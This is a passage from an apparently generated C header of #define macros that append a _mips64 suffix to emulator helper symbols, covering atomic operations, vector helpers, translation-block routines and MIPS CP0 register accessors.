helper_atomic_xor_fetchl_be_mmu helper_atomic_xor_fetchl_be_mmu_mips64 #define helper_atomic_fetch_sminl_be_mmu helper_atomic_fetch_sminl_be_mmu_mips64 #define helper_atomic_fetch_uminl_be_mmu helper_atomic_fetch_uminl_be_mmu_mips64 #define helper_atomic_fetch_smaxl_be_mmu helper_atomic_fetch_smaxl_be_mmu_mips64 #define helper_atomic_fetch_umaxl_be_mmu helper_atomic_fetch_umaxl_be_mmu_mips64 #define helper_atomic_smin_fetchl_be_mmu helper_atomic_smin_fetchl_be_mmu_mips64 #define helper_atomic_umin_fetchl_be_mmu helper_atomic_umin_fetchl_be_mmu_mips64 #define helper_atomic_smax_fetchl_be_mmu helper_atomic_smax_fetchl_be_mmu_mips64 #define helper_atomic_umax_fetchl_be_mmu helper_atomic_umax_fetchl_be_mmu_mips64 #define helper_atomic_fetch_addl_be_mmu helper_atomic_fetch_addl_be_mmu_mips64 #define helper_atomic_add_fetchl_be_mmu helper_atomic_add_fetchl_be_mmu_mips64 #define helper_atomic_cmpxchgq_le_mmu helper_atomic_cmpxchgq_le_mmu_mips64 #define helper_atomic_xchgq_le_mmu helper_atomic_xchgq_le_mmu_mips64 #define helper_atomic_fetch_addq_le_mmu helper_atomic_fetch_addq_le_mmu_mips64 #define helper_atomic_fetch_andq_le_mmu helper_atomic_fetch_andq_le_mmu_mips64 #define 
helper_atomic_fetch_orq_le_mmu helper_atomic_fetch_orq_le_mmu_mips64 #define helper_atomic_fetch_xorq_le_mmu helper_atomic_fetch_xorq_le_mmu_mips64 #define helper_atomic_add_fetchq_le_mmu helper_atomic_add_fetchq_le_mmu_mips64 #define helper_atomic_and_fetchq_le_mmu helper_atomic_and_fetchq_le_mmu_mips64 #define helper_atomic_or_fetchq_le_mmu helper_atomic_or_fetchq_le_mmu_mips64 #define helper_atomic_xor_fetchq_le_mmu helper_atomic_xor_fetchq_le_mmu_mips64 #define helper_atomic_fetch_sminq_le_mmu helper_atomic_fetch_sminq_le_mmu_mips64 #define helper_atomic_fetch_uminq_le_mmu helper_atomic_fetch_uminq_le_mmu_mips64 #define helper_atomic_fetch_smaxq_le_mmu helper_atomic_fetch_smaxq_le_mmu_mips64 #define helper_atomic_fetch_umaxq_le_mmu helper_atomic_fetch_umaxq_le_mmu_mips64 #define helper_atomic_smin_fetchq_le_mmu helper_atomic_smin_fetchq_le_mmu_mips64 #define helper_atomic_umin_fetchq_le_mmu helper_atomic_umin_fetchq_le_mmu_mips64 #define helper_atomic_smax_fetchq_le_mmu helper_atomic_smax_fetchq_le_mmu_mips64 #define helper_atomic_umax_fetchq_le_mmu helper_atomic_umax_fetchq_le_mmu_mips64 #define helper_atomic_cmpxchgq_be_mmu helper_atomic_cmpxchgq_be_mmu_mips64 #define helper_atomic_xchgq_be_mmu helper_atomic_xchgq_be_mmu_mips64 #define helper_atomic_fetch_andq_be_mmu helper_atomic_fetch_andq_be_mmu_mips64 #define helper_atomic_fetch_orq_be_mmu helper_atomic_fetch_orq_be_mmu_mips64 #define helper_atomic_fetch_xorq_be_mmu helper_atomic_fetch_xorq_be_mmu_mips64 #define helper_atomic_and_fetchq_be_mmu helper_atomic_and_fetchq_be_mmu_mips64 #define helper_atomic_or_fetchq_be_mmu helper_atomic_or_fetchq_be_mmu_mips64 #define helper_atomic_xor_fetchq_be_mmu helper_atomic_xor_fetchq_be_mmu_mips64 #define helper_atomic_fetch_sminq_be_mmu helper_atomic_fetch_sminq_be_mmu_mips64 #define helper_atomic_fetch_uminq_be_mmu helper_atomic_fetch_uminq_be_mmu_mips64 #define helper_atomic_fetch_smaxq_be_mmu helper_atomic_fetch_smaxq_be_mmu_mips64 #define helper_atomic_fetch_umaxq_be_mmu helper_atomic_fetch_umaxq_be_mmu_mips64 #define helper_atomic_smin_fetchq_be_mmu helper_atomic_smin_fetchq_be_mmu_mips64 #define helper_atomic_umin_fetchq_be_mmu helper_atomic_umin_fetchq_be_mmu_mips64 #define helper_atomic_smax_fetchq_be_mmu helper_atomic_smax_fetchq_be_mmu_mips64 #define helper_atomic_umax_fetchq_be_mmu helper_atomic_umax_fetchq_be_mmu_mips64 #define helper_atomic_fetch_addq_be_mmu helper_atomic_fetch_addq_be_mmu_mips64 #define helper_atomic_add_fetchq_be_mmu helper_atomic_add_fetchq_be_mmu_mips64 #define helper_atomic_cmpxchgb helper_atomic_cmpxchgb_mips64 #define helper_atomic_xchgb helper_atomic_xchgb_mips64 #define helper_atomic_fetch_addb helper_atomic_fetch_addb_mips64 #define helper_atomic_fetch_andb helper_atomic_fetch_andb_mips64 #define helper_atomic_fetch_orb helper_atomic_fetch_orb_mips64 #define helper_atomic_fetch_xorb helper_atomic_fetch_xorb_mips64 #define helper_atomic_add_fetchb helper_atomic_add_fetchb_mips64 #define helper_atomic_and_fetchb helper_atomic_and_fetchb_mips64 #define helper_atomic_or_fetchb helper_atomic_or_fetchb_mips64 #define helper_atomic_xor_fetchb helper_atomic_xor_fetchb_mips64 #define helper_atomic_fetch_sminb helper_atomic_fetch_sminb_mips64 #define helper_atomic_fetch_uminb helper_atomic_fetch_uminb_mips64 #define helper_atomic_fetch_smaxb helper_atomic_fetch_smaxb_mips64 #define helper_atomic_fetch_umaxb helper_atomic_fetch_umaxb_mips64 #define helper_atomic_smin_fetchb helper_atomic_smin_fetchb_mips64 #define helper_atomic_umin_fetchb 
helper_atomic_umin_fetchb_mips64 #define helper_atomic_smax_fetchb helper_atomic_smax_fetchb_mips64 #define helper_atomic_umax_fetchb helper_atomic_umax_fetchb_mips64 #define helper_atomic_cmpxchgw_le helper_atomic_cmpxchgw_le_mips64 #define helper_atomic_xchgw_le helper_atomic_xchgw_le_mips64 #define helper_atomic_fetch_addw_le helper_atomic_fetch_addw_le_mips64 #define helper_atomic_fetch_andw_le helper_atomic_fetch_andw_le_mips64 #define helper_atomic_fetch_orw_le helper_atomic_fetch_orw_le_mips64 #define helper_atomic_fetch_xorw_le helper_atomic_fetch_xorw_le_mips64 #define helper_atomic_add_fetchw_le helper_atomic_add_fetchw_le_mips64 #define helper_atomic_and_fetchw_le helper_atomic_and_fetchw_le_mips64 #define helper_atomic_or_fetchw_le helper_atomic_or_fetchw_le_mips64 #define helper_atomic_xor_fetchw_le helper_atomic_xor_fetchw_le_mips64 #define helper_atomic_fetch_sminw_le helper_atomic_fetch_sminw_le_mips64 #define helper_atomic_fetch_uminw_le helper_atomic_fetch_uminw_le_mips64 #define helper_atomic_fetch_smaxw_le helper_atomic_fetch_smaxw_le_mips64 #define helper_atomic_fetch_umaxw_le helper_atomic_fetch_umaxw_le_mips64 #define helper_atomic_smin_fetchw_le helper_atomic_smin_fetchw_le_mips64 #define helper_atomic_umin_fetchw_le helper_atomic_umin_fetchw_le_mips64 #define helper_atomic_smax_fetchw_le helper_atomic_smax_fetchw_le_mips64 #define helper_atomic_umax_fetchw_le helper_atomic_umax_fetchw_le_mips64 #define helper_atomic_cmpxchgw_be helper_atomic_cmpxchgw_be_mips64 #define helper_atomic_xchgw_be helper_atomic_xchgw_be_mips64 #define helper_atomic_fetch_andw_be helper_atomic_fetch_andw_be_mips64 #define helper_atomic_fetch_orw_be helper_atomic_fetch_orw_be_mips64 #define helper_atomic_fetch_xorw_be helper_atomic_fetch_xorw_be_mips64 #define helper_atomic_and_fetchw_be helper_atomic_and_fetchw_be_mips64 #define helper_atomic_or_fetchw_be helper_atomic_or_fetchw_be_mips64 #define helper_atomic_xor_fetchw_be helper_atomic_xor_fetchw_be_mips64 #define helper_atomic_fetch_sminw_be helper_atomic_fetch_sminw_be_mips64 #define helper_atomic_fetch_uminw_be helper_atomic_fetch_uminw_be_mips64 #define helper_atomic_fetch_smaxw_be helper_atomic_fetch_smaxw_be_mips64 #define helper_atomic_fetch_umaxw_be helper_atomic_fetch_umaxw_be_mips64 #define helper_atomic_smin_fetchw_be helper_atomic_smin_fetchw_be_mips64 #define helper_atomic_umin_fetchw_be helper_atomic_umin_fetchw_be_mips64 #define helper_atomic_smax_fetchw_be helper_atomic_smax_fetchw_be_mips64 #define helper_atomic_umax_fetchw_be helper_atomic_umax_fetchw_be_mips64 #define helper_atomic_fetch_addw_be helper_atomic_fetch_addw_be_mips64 #define helper_atomic_add_fetchw_be helper_atomic_add_fetchw_be_mips64 #define helper_atomic_cmpxchgl_le helper_atomic_cmpxchgl_le_mips64 #define helper_atomic_xchgl_le helper_atomic_xchgl_le_mips64 #define helper_atomic_fetch_addl_le helper_atomic_fetch_addl_le_mips64 #define helper_atomic_fetch_andl_le helper_atomic_fetch_andl_le_mips64 #define helper_atomic_fetch_orl_le helper_atomic_fetch_orl_le_mips64 #define helper_atomic_fetch_xorl_le helper_atomic_fetch_xorl_le_mips64 #define helper_atomic_add_fetchl_le helper_atomic_add_fetchl_le_mips64 #define helper_atomic_and_fetchl_le helper_atomic_and_fetchl_le_mips64 #define helper_atomic_or_fetchl_le helper_atomic_or_fetchl_le_mips64 #define helper_atomic_xor_fetchl_le helper_atomic_xor_fetchl_le_mips64 #define helper_atomic_fetch_sminl_le helper_atomic_fetch_sminl_le_mips64 #define helper_atomic_fetch_uminl_le 
helper_atomic_fetch_uminl_le_mips64 #define helper_atomic_fetch_smaxl_le helper_atomic_fetch_smaxl_le_mips64 #define helper_atomic_fetch_umaxl_le helper_atomic_fetch_umaxl_le_mips64 #define helper_atomic_smin_fetchl_le helper_atomic_smin_fetchl_le_mips64 #define helper_atomic_umin_fetchl_le helper_atomic_umin_fetchl_le_mips64 #define helper_atomic_smax_fetchl_le helper_atomic_smax_fetchl_le_mips64 #define helper_atomic_umax_fetchl_le helper_atomic_umax_fetchl_le_mips64 #define helper_atomic_cmpxchgl_be helper_atomic_cmpxchgl_be_mips64 #define helper_atomic_xchgl_be helper_atomic_xchgl_be_mips64 #define helper_atomic_fetch_andl_be helper_atomic_fetch_andl_be_mips64 #define helper_atomic_fetch_orl_be helper_atomic_fetch_orl_be_mips64 #define helper_atomic_fetch_xorl_be helper_atomic_fetch_xorl_be_mips64 #define helper_atomic_and_fetchl_be helper_atomic_and_fetchl_be_mips64 #define helper_atomic_or_fetchl_be helper_atomic_or_fetchl_be_mips64 #define helper_atomic_xor_fetchl_be helper_atomic_xor_fetchl_be_mips64 #define helper_atomic_fetch_sminl_be helper_atomic_fetch_sminl_be_mips64 #define helper_atomic_fetch_uminl_be helper_atomic_fetch_uminl_be_mips64 #define helper_atomic_fetch_smaxl_be helper_atomic_fetch_smaxl_be_mips64 #define helper_atomic_fetch_umaxl_be helper_atomic_fetch_umaxl_be_mips64 #define helper_atomic_smin_fetchl_be helper_atomic_smin_fetchl_be_mips64 #define helper_atomic_umin_fetchl_be helper_atomic_umin_fetchl_be_mips64 #define helper_atomic_smax_fetchl_be helper_atomic_smax_fetchl_be_mips64 #define helper_atomic_umax_fetchl_be helper_atomic_umax_fetchl_be_mips64 #define helper_atomic_fetch_addl_be helper_atomic_fetch_addl_be_mips64 #define helper_atomic_add_fetchl_be helper_atomic_add_fetchl_be_mips64 #define helper_atomic_cmpxchgq_le helper_atomic_cmpxchgq_le_mips64 #define helper_atomic_xchgq_le helper_atomic_xchgq_le_mips64 #define helper_atomic_fetch_addq_le helper_atomic_fetch_addq_le_mips64 #define helper_atomic_fetch_andq_le helper_atomic_fetch_andq_le_mips64 #define helper_atomic_fetch_orq_le helper_atomic_fetch_orq_le_mips64 #define helper_atomic_fetch_xorq_le helper_atomic_fetch_xorq_le_mips64 #define helper_atomic_add_fetchq_le helper_atomic_add_fetchq_le_mips64 #define helper_atomic_and_fetchq_le helper_atomic_and_fetchq_le_mips64 #define helper_atomic_or_fetchq_le helper_atomic_or_fetchq_le_mips64 #define helper_atomic_xor_fetchq_le helper_atomic_xor_fetchq_le_mips64 #define helper_atomic_fetch_sminq_le helper_atomic_fetch_sminq_le_mips64 #define helper_atomic_fetch_uminq_le helper_atomic_fetch_uminq_le_mips64 #define helper_atomic_fetch_smaxq_le helper_atomic_fetch_smaxq_le_mips64 #define helper_atomic_fetch_umaxq_le helper_atomic_fetch_umaxq_le_mips64 #define helper_atomic_smin_fetchq_le helper_atomic_smin_fetchq_le_mips64 #define helper_atomic_umin_fetchq_le helper_atomic_umin_fetchq_le_mips64 #define helper_atomic_smax_fetchq_le helper_atomic_smax_fetchq_le_mips64 #define helper_atomic_umax_fetchq_le helper_atomic_umax_fetchq_le_mips64 #define helper_atomic_cmpxchgq_be helper_atomic_cmpxchgq_be_mips64 #define helper_atomic_xchgq_be helper_atomic_xchgq_be_mips64 #define helper_atomic_fetch_andq_be helper_atomic_fetch_andq_be_mips64 #define helper_atomic_fetch_orq_be helper_atomic_fetch_orq_be_mips64 #define helper_atomic_fetch_xorq_be helper_atomic_fetch_xorq_be_mips64 #define helper_atomic_and_fetchq_be helper_atomic_and_fetchq_be_mips64 #define helper_atomic_or_fetchq_be helper_atomic_or_fetchq_be_mips64 #define helper_atomic_xor_fetchq_be 
helper_atomic_xor_fetchq_be_mips64 #define helper_atomic_fetch_sminq_be helper_atomic_fetch_sminq_be_mips64 #define helper_atomic_fetch_uminq_be helper_atomic_fetch_uminq_be_mips64 #define helper_atomic_fetch_smaxq_be helper_atomic_fetch_smaxq_be_mips64 #define helper_atomic_fetch_umaxq_be helper_atomic_fetch_umaxq_be_mips64 #define helper_atomic_smin_fetchq_be helper_atomic_smin_fetchq_be_mips64 #define helper_atomic_umin_fetchq_be helper_atomic_umin_fetchq_be_mips64 #define helper_atomic_smax_fetchq_be helper_atomic_smax_fetchq_be_mips64 #define helper_atomic_umax_fetchq_be helper_atomic_umax_fetchq_be_mips64 #define helper_atomic_fetch_addq_be helper_atomic_fetch_addq_be_mips64 #define helper_atomic_add_fetchq_be helper_atomic_add_fetchq_be_mips64 #define cpu_ldub_code cpu_ldub_code_mips64 #define cpu_lduw_code cpu_lduw_code_mips64 #define cpu_ldl_code cpu_ldl_code_mips64 #define cpu_ldq_code cpu_ldq_code_mips64 #define helper_div_i32 helper_div_i32_mips64 #define helper_rem_i32 helper_rem_i32_mips64 #define helper_divu_i32 helper_divu_i32_mips64 #define helper_remu_i32 helper_remu_i32_mips64 #define helper_shl_i64 helper_shl_i64_mips64 #define helper_shr_i64 helper_shr_i64_mips64 #define helper_sar_i64 helper_sar_i64_mips64 #define helper_div_i64 helper_div_i64_mips64 #define helper_rem_i64 helper_rem_i64_mips64 #define helper_divu_i64 helper_divu_i64_mips64 #define helper_remu_i64 helper_remu_i64_mips64 #define helper_muluh_i64 helper_muluh_i64_mips64 #define helper_mulsh_i64 helper_mulsh_i64_mips64 #define helper_clz_i32 helper_clz_i32_mips64 #define helper_ctz_i32 helper_ctz_i32_mips64 #define helper_clz_i64 helper_clz_i64_mips64 #define helper_ctz_i64 helper_ctz_i64_mips64 #define helper_clrsb_i32 helper_clrsb_i32_mips64 #define helper_clrsb_i64 helper_clrsb_i64_mips64 #define helper_ctpop_i32 helper_ctpop_i32_mips64 #define helper_ctpop_i64 helper_ctpop_i64_mips64 #define helper_lookup_tb_ptr helper_lookup_tb_ptr_mips64 #define helper_exit_atomic helper_exit_atomic_mips64 #define helper_gvec_add8 helper_gvec_add8_mips64 #define helper_gvec_add16 helper_gvec_add16_mips64 #define helper_gvec_add32 helper_gvec_add32_mips64 #define helper_gvec_add64 helper_gvec_add64_mips64 #define helper_gvec_adds8 helper_gvec_adds8_mips64 #define helper_gvec_adds16 helper_gvec_adds16_mips64 #define helper_gvec_adds32 helper_gvec_adds32_mips64 #define helper_gvec_adds64 helper_gvec_adds64_mips64 #define helper_gvec_sub8 helper_gvec_sub8_mips64 #define helper_gvec_sub16 helper_gvec_sub16_mips64 #define helper_gvec_sub32 helper_gvec_sub32_mips64 #define helper_gvec_sub64 helper_gvec_sub64_mips64 #define helper_gvec_subs8 helper_gvec_subs8_mips64 #define helper_gvec_subs16 helper_gvec_subs16_mips64 #define helper_gvec_subs32 helper_gvec_subs32_mips64 #define helper_gvec_subs64 helper_gvec_subs64_mips64 #define helper_gvec_mul8 helper_gvec_mul8_mips64 #define helper_gvec_mul16 helper_gvec_mul16_mips64 #define helper_gvec_mul32 helper_gvec_mul32_mips64 #define helper_gvec_mul64 helper_gvec_mul64_mips64 #define helper_gvec_muls8 helper_gvec_muls8_mips64 #define helper_gvec_muls16 helper_gvec_muls16_mips64 #define helper_gvec_muls32 helper_gvec_muls32_mips64 #define helper_gvec_muls64 helper_gvec_muls64_mips64 #define helper_gvec_neg8 helper_gvec_neg8_mips64 #define helper_gvec_neg16 helper_gvec_neg16_mips64 #define helper_gvec_neg32 helper_gvec_neg32_mips64 #define helper_gvec_neg64 helper_gvec_neg64_mips64 #define helper_gvec_abs8 helper_gvec_abs8_mips64 #define helper_gvec_abs16 helper_gvec_abs16_mips64 
#define helper_gvec_abs32 helper_gvec_abs32_mips64 #define helper_gvec_abs64 helper_gvec_abs64_mips64 #define helper_gvec_mov helper_gvec_mov_mips64 #define helper_gvec_dup64 helper_gvec_dup64_mips64 #define helper_gvec_dup32 helper_gvec_dup32_mips64 #define helper_gvec_dup16 helper_gvec_dup16_mips64 #define helper_gvec_dup8 helper_gvec_dup8_mips64 #define helper_gvec_not helper_gvec_not_mips64 #define helper_gvec_and helper_gvec_and_mips64 #define helper_gvec_or helper_gvec_or_mips64 #define helper_gvec_xor helper_gvec_xor_mips64 #define helper_gvec_andc helper_gvec_andc_mips64 #define helper_gvec_orc helper_gvec_orc_mips64 #define helper_gvec_nand helper_gvec_nand_mips64 #define helper_gvec_nor helper_gvec_nor_mips64 #define helper_gvec_eqv helper_gvec_eqv_mips64 #define helper_gvec_ands helper_gvec_ands_mips64 #define helper_gvec_xors helper_gvec_xors_mips64 #define helper_gvec_ors helper_gvec_ors_mips64 #define helper_gvec_shl8i helper_gvec_shl8i_mips64 #define helper_gvec_shl16i helper_gvec_shl16i_mips64 #define helper_gvec_shl32i helper_gvec_shl32i_mips64 #define helper_gvec_shl64i helper_gvec_shl64i_mips64 #define helper_gvec_shr8i helper_gvec_shr8i_mips64 #define helper_gvec_shr16i helper_gvec_shr16i_mips64 #define helper_gvec_shr32i helper_gvec_shr32i_mips64 #define helper_gvec_shr64i helper_gvec_shr64i_mips64 #define helper_gvec_sar8i helper_gvec_sar8i_mips64 #define helper_gvec_sar16i helper_gvec_sar16i_mips64 #define helper_gvec_sar32i helper_gvec_sar32i_mips64 #define helper_gvec_sar64i helper_gvec_sar64i_mips64 #define helper_gvec_shl8v helper_gvec_shl8v_mips64 #define helper_gvec_shl16v helper_gvec_shl16v_mips64 #define helper_gvec_shl32v helper_gvec_shl32v_mips64 #define helper_gvec_shl64v helper_gvec_shl64v_mips64 #define helper_gvec_shr8v helper_gvec_shr8v_mips64 #define helper_gvec_shr16v helper_gvec_shr16v_mips64 #define helper_gvec_shr32v helper_gvec_shr32v_mips64 #define helper_gvec_shr64v helper_gvec_shr64v_mips64 #define helper_gvec_sar8v helper_gvec_sar8v_mips64 #define helper_gvec_sar16v helper_gvec_sar16v_mips64 #define helper_gvec_sar32v helper_gvec_sar32v_mips64 #define helper_gvec_sar64v helper_gvec_sar64v_mips64 #define helper_gvec_eq8 helper_gvec_eq8_mips64 #define helper_gvec_ne8 helper_gvec_ne8_mips64 #define helper_gvec_lt8 helper_gvec_lt8_mips64 #define helper_gvec_le8 helper_gvec_le8_mips64 #define helper_gvec_ltu8 helper_gvec_ltu8_mips64 #define helper_gvec_leu8 helper_gvec_leu8_mips64 #define helper_gvec_eq16 helper_gvec_eq16_mips64 #define helper_gvec_ne16 helper_gvec_ne16_mips64 #define helper_gvec_lt16 helper_gvec_lt16_mips64 #define helper_gvec_le16 helper_gvec_le16_mips64 #define helper_gvec_ltu16 helper_gvec_ltu16_mips64 #define helper_gvec_leu16 helper_gvec_leu16_mips64 #define helper_gvec_eq32 helper_gvec_eq32_mips64 #define helper_gvec_ne32 helper_gvec_ne32_mips64 #define helper_gvec_lt32 helper_gvec_lt32_mips64 #define helper_gvec_le32 helper_gvec_le32_mips64 #define helper_gvec_ltu32 helper_gvec_ltu32_mips64 #define helper_gvec_leu32 helper_gvec_leu32_mips64 #define helper_gvec_eq64 helper_gvec_eq64_mips64 #define helper_gvec_ne64 helper_gvec_ne64_mips64 #define helper_gvec_lt64 helper_gvec_lt64_mips64 #define helper_gvec_le64 helper_gvec_le64_mips64 #define helper_gvec_ltu64 helper_gvec_ltu64_mips64 #define helper_gvec_leu64 helper_gvec_leu64_mips64 #define helper_gvec_ssadd8 helper_gvec_ssadd8_mips64 #define helper_gvec_ssadd16 helper_gvec_ssadd16_mips64 #define helper_gvec_ssadd32 helper_gvec_ssadd32_mips64 #define helper_gvec_ssadd64 
helper_gvec_ssadd64_mips64 #define helper_gvec_sssub8 helper_gvec_sssub8_mips64 #define helper_gvec_sssub16 helper_gvec_sssub16_mips64 #define helper_gvec_sssub32 helper_gvec_sssub32_mips64 #define helper_gvec_sssub64 helper_gvec_sssub64_mips64 #define helper_gvec_usadd8 helper_gvec_usadd8_mips64 #define helper_gvec_usadd16 helper_gvec_usadd16_mips64 #define helper_gvec_usadd32 helper_gvec_usadd32_mips64 #define helper_gvec_usadd64 helper_gvec_usadd64_mips64 #define helper_gvec_ussub8 helper_gvec_ussub8_mips64 #define helper_gvec_ussub16 helper_gvec_ussub16_mips64 #define helper_gvec_ussub32 helper_gvec_ussub32_mips64 #define helper_gvec_ussub64 helper_gvec_ussub64_mips64 #define helper_gvec_smin8 helper_gvec_smin8_mips64 #define helper_gvec_smin16 helper_gvec_smin16_mips64 #define helper_gvec_smin32 helper_gvec_smin32_mips64 #define helper_gvec_smin64 helper_gvec_smin64_mips64 #define helper_gvec_smax8 helper_gvec_smax8_mips64 #define helper_gvec_smax16 helper_gvec_smax16_mips64 #define helper_gvec_smax32 helper_gvec_smax32_mips64 #define helper_gvec_smax64 helper_gvec_smax64_mips64 #define helper_gvec_umin8 helper_gvec_umin8_mips64 #define helper_gvec_umin16 helper_gvec_umin16_mips64 #define helper_gvec_umin32 helper_gvec_umin32_mips64 #define helper_gvec_umin64 helper_gvec_umin64_mips64 #define helper_gvec_umax8 helper_gvec_umax8_mips64 #define helper_gvec_umax16 helper_gvec_umax16_mips64 #define helper_gvec_umax32 helper_gvec_umax32_mips64 #define helper_gvec_umax64 helper_gvec_umax64_mips64 #define helper_gvec_bitsel helper_gvec_bitsel_mips64 #define cpu_restore_state cpu_restore_state_mips64 #define page_collection_lock page_collection_lock_mips64 #define page_collection_unlock page_collection_unlock_mips64 #define free_code_gen_buffer free_code_gen_buffer_mips64 #define tcg_exec_init tcg_exec_init_mips64 #define tb_cleanup tb_cleanup_mips64 #define tb_flush tb_flush_mips64 #define tb_phys_invalidate tb_phys_invalidate_mips64 #define tb_gen_code tb_gen_code_mips64 #define tb_exec_lock tb_exec_lock_mips64 #define tb_exec_unlock tb_exec_unlock_mips64 #define tb_invalidate_phys_page_range tb_invalidate_phys_page_range_mips64 #define tb_invalidate_phys_range tb_invalidate_phys_range_mips64 #define tb_invalidate_phys_page_fast tb_invalidate_phys_page_fast_mips64 #define tb_check_watchpoint tb_check_watchpoint_mips64 #define cpu_io_recompile cpu_io_recompile_mips64 #define tb_flush_jmp_cache tb_flush_jmp_cache_mips64 #define tcg_flush_softmmu_tlb tcg_flush_softmmu_tlb_mips64 #define translator_loop_temp_check translator_loop_temp_check_mips64 #define translator_loop translator_loop_mips64 #define helper_atomic_cmpxchgo_le_mmu helper_atomic_cmpxchgo_le_mmu_mips64 #define helper_atomic_cmpxchgo_be_mmu helper_atomic_cmpxchgo_be_mmu_mips64 #define helper_atomic_ldo_le_mmu helper_atomic_ldo_le_mmu_mips64 #define helper_atomic_ldo_be_mmu helper_atomic_ldo_be_mmu_mips64 #define helper_atomic_sto_le_mmu helper_atomic_sto_le_mmu_mips64 #define helper_atomic_sto_be_mmu helper_atomic_sto_be_mmu_mips64 #define unassigned_mem_ops unassigned_mem_ops_mips64 #define floatx80_infinity floatx80_infinity_mips64 #define dup_const_func dup_const_func_mips64 #define gen_helper_raise_exception gen_helper_raise_exception_mips64 #define gen_helper_raise_interrupt gen_helper_raise_interrupt_mips64 #define gen_helper_vfp_get_fpscr gen_helper_vfp_get_fpscr_mips64 #define gen_helper_vfp_set_fpscr gen_helper_vfp_set_fpscr_mips64 #define gen_helper_cpsr_read gen_helper_cpsr_read_mips64 #define gen_helper_cpsr_write 
gen_helper_cpsr_write_mips64 #define tlb_reset_dirty_by_vaddr tlb_reset_dirty_by_vaddr_mips64 #define helper_mfc0_mvpcontrol helper_mfc0_mvpcontrol_mips64 #define helper_mfc0_mvpconf0 helper_mfc0_mvpconf0_mips64 #define helper_mfc0_mvpconf1 helper_mfc0_mvpconf1_mips64 #define helper_mfc0_random helper_mfc0_random_mips64 #define helper_mfc0_tcstatus helper_mfc0_tcstatus_mips64 #define helper_mftc0_tcstatus helper_mftc0_tcstatus_mips64 #define helper_mfc0_tcbind helper_mfc0_tcbind_mips64 #define helper_mftc0_tcbind helper_mftc0_tcbind_mips64 #define helper_mfc0_tcrestart helper_mfc0_tcrestart_mips64 #define helper_mftc0_tcrestart helper_mftc0_tcrestart_mips64 #define helper_mfc0_tchalt helper_mfc0_tchalt_mips64 #define helper_mftc0_tchalt helper_mftc0_tchalt_mips64 #define helper_mfc0_tccontext helper_mfc0_tccontext_mips64 #define helper_mftc0_tccontext helper_mftc0_tccontext_mips64 #define helper_mfc0_tcschedule helper_mfc0_tcschedule_mips64 #define helper_mftc0_tcschedule helper_mftc0_tcschedule_mips64 #define helper_mfc0_tcschefback helper_mfc0_tcschefback_mips64 #define helper_mftc0_tcschefback helper_mftc0_tcschefback_mips64 #define helper_mfc0_count helper_mfc0_count_mips64 #define helper_mfc0_saar helper_mfc0_saar_mips64 #define helper_mfhc0_saar helper_mfhc0_saar_mips64 #define helper_mftc0_entryhi helper_mftc0_entryhi_mips64 #define helper_mftc0_cause helper_mftc0_cause_mips64 #define helper_mftc0_status helper_mftc0_status_mips64 #define helper_mfc0_lladdr helper_mfc0_lladdr_mips64 #define helper_mfc0_maar helper_mfc0_maar_mips64 #define helper_mfhc0_maar helper_mfhc0_maar_mips64 #define helper_mfc0_watchlo helper_mfc0_watchlo_mips64 #define helper_mfc0_watchhi helper_mfc0_watchhi_mips64 #define helper_mfhc0_watchhi helper_mfhc0_watchhi_mips64 #define helper_mfc0_debug helper_mfc0_debug_mips64 #define helper_mftc0_debug helper_mftc0_debug_mips64 #define helper_dmfc0_tcrestart helper_dmfc0_tcrestart_mips64 #define helper_dmfc0_tchalt helper_dmfc0_tchalt_mips64 #define helper_dmfc0_tccontext helper_dmfc0_tccontext_mips64 #define helper_dmfc0_tcschedule helper_dmfc0_tcschedule_mips64 #define helper_dmfc0_tcschefback helper_dmfc0_tcschefback_mips64 #define helper_dmfc0_lladdr helper_dmfc0_lladdr_mips64 #define helper_dmfc0_maar helper_dmfc0_maar_mips64 #define helper_dmfc0_watchlo helper_dmfc0_watchlo_mips64 #define helper_dmfc0_watchhi helper_dmfc0_watchhi_mips64 #define helper_dmfc0_saar helper_dmfc0_saar_mips64 #define helper_mtc0_index helper_mtc0_index_mips64 #define helper_mtc0_mvpcontrol helper_mtc0_mvpcontrol_mips64 #define helper_mtc0_vpecontrol helper_mtc0_vpecontrol_mips64 #define helper_mttc0_vpecontrol helper_mttc0_vpecontrol_mips64 #define helper_mftc0_vpecontrol helper_mftc0_vpecontrol_mips64 #define helper_mftc0_vpeconf0 helper_mftc0_vpeconf0_mips64 #define helper_mtc0_vpeconf0 helper_mtc0_vpeconf0_mips64 #define helper_mttc0_vpeconf0 helper_mttc0_vpeconf0_mips64 #define helper_mtc0_vpeconf1 helper_mtc0_vpeconf1_mips64 #define helper_mtc0_yqmask helper_mtc0_yqmask_mips64 #define helper_mtc0_vpeopt helper_mtc0_vpeopt_mips64 #define helper_mtc0_entrylo0 helper_mtc0_entrylo0_mips64 #define helper_dmtc0_entrylo0 helper_dmtc0_entrylo0_mips64 #define helper_mtc0_tcstatus helper_mtc0_tcstatus_mips64 #define helper_mttc0_tcstatus helper_mttc0_tcstatus_mips64 #define helper_mtc0_tcbind helper_mtc0_tcbind_mips64 #define helper_mttc0_tcbind helper_mttc0_tcbind_mips64 #define helper_mtc0_tcrestart helper_mtc0_tcrestart_mips64 #define helper_mttc0_tcrestart 
helper_mttc0_tcrestart_mips64 #define helper_mtc0_tchalt helper_mtc0_tchalt_mips64 #define helper_mttc0_tchalt helper_mttc0_tchalt_mips64 #define helper_mtc0_tccontext helper_mtc0_tccontext_mips64 #define helper_mttc0_tccontext helper_mttc0_tccontext_mips64 #define helper_mtc0_tcschedule helper_mtc0_tcschedule_mips64 #define helper_mttc0_tcschedule helper_mttc0_tcschedule_mips64 #define helper_mtc0_tcschefback helper_mtc0_tcschefback_mips64 #define helper_mttc0_tcschefback helper_mttc0_tcschefback_mips64 #define helper_mtc0_entrylo1 helper_mtc0_entrylo1_mips64 #define helper_dmtc0_entrylo1 helper_dmtc0_entrylo1_mips64 #define helper_mtc0_context helper_mtc0_context_mips64 #define helper_mtc0_memorymapid helper_mtc0_memorymapid_mips64 #define update_pagemask update_pagemask_mips64 #define helper_mtc0_pagemask helper_mtc0_pagemask_mips64 #define helper_mtc0_pagegrain helper_mtc0_pagegrain_mips64 #define helper_mtc0_segctl0 helper_mtc0_segctl0_mips64 #define helper_mtc0_segctl1 helper_mtc0_segctl1_mips64 #define helper_mtc0_segctl2 helper_mtc0_segctl2_mips64 #define helper_mtc0_pwfield helper_mtc0_pwfield_mips64 #define helper_mtc0_pwsize helper_mtc0_pwsize_mips64 #define helper_mtc0_wired helper_mtc0_wired_mips64 #define helper_mtc0_pwctl helper_mtc0_pwctl_mips64 #define 